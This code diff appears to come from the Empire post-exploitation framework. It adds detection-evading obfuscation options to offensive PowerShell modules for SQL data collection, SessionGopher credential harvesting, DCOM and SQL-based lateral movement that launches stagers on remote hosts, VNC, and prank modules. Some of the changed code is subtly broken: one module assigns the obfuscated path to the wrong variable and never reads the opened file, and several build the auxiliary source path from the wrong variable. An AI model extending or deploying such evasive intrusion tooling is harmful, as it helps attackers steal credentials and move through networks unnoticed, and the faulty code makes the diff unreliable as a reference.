diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py index 2eb82af..3039b13 100644 --- a/lib/modules/powershell/collection/get_indexed_item.py +++ b/lib/modules/powershell/collection/get_indexed_item.py @@ -55,7 +55,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1" diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py index cb73c07..7f9d007 100644 --- a/lib/modules/powershell/collection/get_sql_column_sample_data.py +++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py @@ -67,7 +67,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] @@ -78,34 +78,42 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLColumnSampleData.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + script = moduleSource.replace("module_source", "obfuscated_module_source") try: - with open(moduleSource, 'r') as source: - script = source.read() + f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | " - script += " Get-SQLColumnSampleData" + scriptEnd += " -Password "+password + scriptEnd += " | " + scriptEnd += " Get-SQLColumnSampleData" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "" and not check_all: - script += " -Instance "+instance + scriptEnd += " -Instance "+instance if no_defaults: - script += " -NoDefaults " + scriptEnd += " -NoDefaults " + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py index 551cc2a..bdf45f5 100644 --- a/lib/modules/powershell/collection/get_sql_query.py +++ b/lib/modules/powershell/collection/get_sql_query.py @@ -60,7 +60,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] @@ -70,6 +70,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() @@ -77,13 +80,15 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" - script += " Get-SQLQuery" + scriptEnd = " Get-SQLQuery" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "": - script += " -Instance "+instance - script += " -Query "+"\'"+query+"\'" - + scriptEnd += " -Instance "+instance + scriptEnd += " -Query "+"\'"+query+"\'" + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py index 5be7356..c7acc1b 100644 --- a/lib/modules/powershell/credentials/sessiongopher.py +++ b/lib/modules/powershell/credentials/sessiongopher.py @@ -105,12 +105,15 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-SessionGopher.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -121,7 +124,7 @@ class Module: f.close() script = moduleCode - script += "Invoke-SessionGopher" + scriptEnd = "Invoke-SessionGopher" # add any arguments to the end execution of the script for option,values in self.options.iteritems(): @@ -129,8 +132,10 @@ class Module: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) - + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py index 3b99422..ba766c3 100644 --- a/lib/modules/powershell/lateral_movement/invoke_dcom.py +++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py @@ -83,7 +83,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] method = self.options['Method']['Value'] @@ -93,7 +93,9 @@ class Module: proxyCreds = self.options['ProxyCreds']['Value'] moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-DCOM.ps1" - + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -124,9 +126,11 @@ class Module: else: stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher - script += "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd) + scriptEnd = "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd) - script += "| Out-String | %{$_ + \"`n\"};" - + scriptEnd += "| Out-String | %{$_ + \"`n\"};" + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py index 8478b8d..316cae5 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py +++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py @@ -74,7 +74,7 @@ class Module: option, value = param if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): credID = self.options["CredID"]['Value'] if credID != "": @@ -101,6 +101,9 @@ class Module: moduleSource = self.mainMenu.installPath + "data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1" moduleCode = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: moduleCode = source.read() @@ -122,10 +125,13 @@ class Module: command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher - script += "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command) + scriptEnd = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command) if username != "": - script += " -UserName "+username + scriptEnd += " -UserName "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py index dfd2863..e3ef899 100644 --- a/lib/modules/powershell/management/vnc.py +++ b/lib/modules/powershell/management/vnc.py @@ -71,13 +71,15 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in th Invoke-Vnc.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Vnc.ps1" - + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -89,14 +91,17 @@ class Module: script = moduleCode - script += "\nInvoke-Vnc" + scriptEnd = "\nInvoke-Vnc" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 1b92afc..948c69a 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -62,7 +62,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] @@ -71,6 +71,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() @@ -80,19 +83,25 @@ class Module: if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | Select Instance | " - script += " Get-SQLServerLoginDefaultPw" + scriptEnd += " -Password "+password + scriptEnd += " | Select Instance | " + scriptEnd += " Get-SQLServerLoginDefaultPw" if instance != "" and not check_all: - script += " -Instance "+instance + scriptEnd += " -Instance "+instance + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 08ed64e..1939a24 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py @@ -78,7 +78,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # the PowerShell script itself, with the command to invoke # for execution appended to the end. Scripts should output @@ -91,6 +91,9 @@ class Module: # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -101,7 +104,7 @@ class Module: f.close() script = moduleCode - script += "Start-TCPMonitor" + scriptEnd = "Start-TCPMonitor" # add any arguments to the end execution of the script for option,values in self.options.iteritems(): @@ -109,8 +112,10 @@ class Module: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) - + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index 5ac139d..dbf5362 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -79,7 +79,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): domainController = self.options['DomainController']['Value'] computerName = self.options['ComputerName']['Value'] @@ -92,6 +92,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() @@ -99,20 +102,22 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" - script += " Get-SQLInstanceDomain" + scriptEnd = " Get-SQLInstanceDomain" if username != "": - script += " -Username " + username + scriptEnd += " -Username " + username if password != "": - script += " -Password " + password + scriptEnd += " -Password " + password if domainController != "": - script += " -DomainController "+domainController + scriptEnd += " -DomainController "+domainController if computerName != "": - script += " -ComputerName "+computerName + scriptEnd += " -ComputerName "+computerName if domainAccount != "": - script += " -DomainAccount "+domainAccount + scriptEnd += " -DomainAccount "+domainAccount if checkMgmt.lower() != "false": - script += " -CheckMgmt" + scriptEnd += " -CheckMgmt" if udpTimeOut != "": - script += " -UDPTimeOut "+udpTimeOut - + scriptEnd += " -UDPTimeOut "+udpTimeOut + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index e65c388..83c9bf9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -60,7 +60,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] @@ -69,6 +69,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() @@ -78,24 +81,29 @@ class Module: if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | " - script += " Get-SQLServerInfo" + scriptEnd += " -Password "+password + scriptEnd += " | " + scriptEnd += " Get-SQLServerInfo" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "" and not check_all: - script += " -Instance "+instance - + scriptEnd += " -Instance "+instance + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py index 70496f6..90abefb 100644 --- a/lib/modules/powershell/trollsploit/get_schwifty.py +++ b/lib/modules/powershell/trollsploit/get_schwifty.py @@ -56,7 +56,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ Function Get-Schwifty @@ -98,5 +98,6 @@ Function Get-Schwifty script += " -" + str(option) + " " + str(values['Value']) script += "; 'Agent is getting schwifty!'" - + if obfuscate: + script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py index 65d9ca4..62d76a9 100644 --- a/lib/modules/powershell/trollsploit/wlmdr.py +++ b/lib/modules/powershell/trollsploit/wlmdr.py @@ -65,7 +65,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-Wlrmdr { @@ -107,5 +107,6 @@ Invoke-Wlrmdr""" script += " -" + str(option) else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" - + if obfuscate: + script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script